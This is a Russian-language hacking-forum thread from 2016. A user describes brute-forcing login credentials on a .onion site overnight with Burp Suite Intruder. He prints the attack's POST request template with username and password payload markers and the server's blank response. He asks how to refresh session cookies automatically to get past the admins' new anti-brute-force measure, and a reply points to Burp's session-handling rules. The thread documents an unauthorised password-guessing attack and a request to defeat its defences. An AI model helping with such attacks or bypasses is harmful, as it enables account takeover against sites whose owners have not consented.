Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Burp Suite вопрос по Intruder (https://forum.antichat.xyz/showthread.php?t=445809)

mustafallah 19.12.2016 20:01
Добрый день народ в общем ситуация такова. До сегодняшнего дня брутил один сайт при помощи интрудера ставил на ночь и у меня перебирало около 1000 000 комбинаций. Сейчас админы сделали небольшую защиту что мне приходится какждые 10 000 комбинаций перенастраивать все. Объясняю в чем причина.

POST /login.php?action=in HTTP/1.1

Host: site.onion

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://site.onion/login.php

Cookie: ud=w; uw=327557622106; uk=492077513752

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 116

form_sent=1&redirect_url=index.php&req_username=§ user§&req_password=§password§&save_pass=1&login =%D0%92%D1%85%D0%BE%D0%B4

Значит до 10 000 попыток приходит ответ, что логин и пароль неправильный, а после 10 000 начинает приходит ответ с содержимым 222 байта.... т.е. пустая страница.

HTTP/1.1 200 OK

Server: nginx

Date: Mon, 19 Dec 2016 15:43:11 GMT

Content-Type: text/html; charset=UTF-8

Connection: close

Vary: Accept-Encoding

X-Powered-By: PHP/7.0.13

Cache-Control: private

Content-Length: 0

После чего мне приходится получить новые куки через браузер

POST /login.php?action=in HTTP/1.1

Host: site.onion

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://site.onion/login.php

Cookie: ud=w; uw=327557681334; uk=492077602728

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 116

form_sent=1&redirect_url=index.php&req_username=§ user§&req_password=§password§&save_pass=1&login =%D0%92%D1%85%D0%BE%D0%B4

То есть после смены uw и uk перебор продолжается.

Бана по айпи нету.

Как бы получать эти куки в автоматическом режиме чтобы перебор продолжался?

Заранее огромное спасибо!

Kaimi 19.12.2016 20:50
https://portswigger.net/burp/help/op...uleeditor.html


Время: 04:51